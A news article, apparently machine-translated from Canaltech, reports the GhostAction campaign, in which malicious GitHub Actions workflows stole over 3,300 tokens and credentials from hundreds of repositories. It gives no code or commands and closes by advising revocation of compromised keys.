Archetyp Links

A new cybercriminal effort is affecting Github, resulting in theft of over 3,300 access keys and credentials such as tokens and API keys.Called Ghostaction, the campaign was discovered by security company Gitguardian, with the first signs emerging on September 2 this year during Fastuid. According to experts, the attack aims at users' trust in the Github ecosystem, affecting the supply chain of project iterations on the platform.The first step of hackers is to invade the programmers account, discreetly inserting malicious files into the Github Actions workflow. The file is automatically activated whenever the project code is updated, causing malicious code to read the programming keys stored in the project environment.This includes PYPL and NPM tokens, Cloudflare keys and AWS and database credentials, sending the stolen information to an external server, controlled by cybercriminals. Canaltech is on WhatsApp!Enter the channel and follow news and technology tips WhatsApp Continues after advertising Attacks compromised more than 800 repositories Since the discovery of the initiative, the researchers have found that Ghostaction is greater than believed, with malicious commits being seen in at least 817 repositories, compromising up to 3,325 keys in 9 NPM packages and 15 PYPL packages.Integer corporate SDK portfolios were affected, in some cases compromising the repositories of Python, Rust, JavaScript and GO. The full dimension of the attack was noted last Friday (5), when Gitguardian notified the safety of Github, NPM and Pypl, also alerting 573 of the repositories affected on the platform.Approximately 100 of them had already detained the invasion and reversed malicious actions.The hacker server that received the data was no longer accessible since. The attack is similar to the recent S1nguarity, which also affected Github, but experts do not believe there is a connection between the two initiatives.The recommendation for users who have been affected is to revoke all compromised tokens and keys as soon as possible, preventing hackers from publishing versions of their software with inserted malware. Check out more on Canaltech: Video |Google has suffered the largest hacker attack of recent years #ctNews Continues after advertising Source: Gitguardian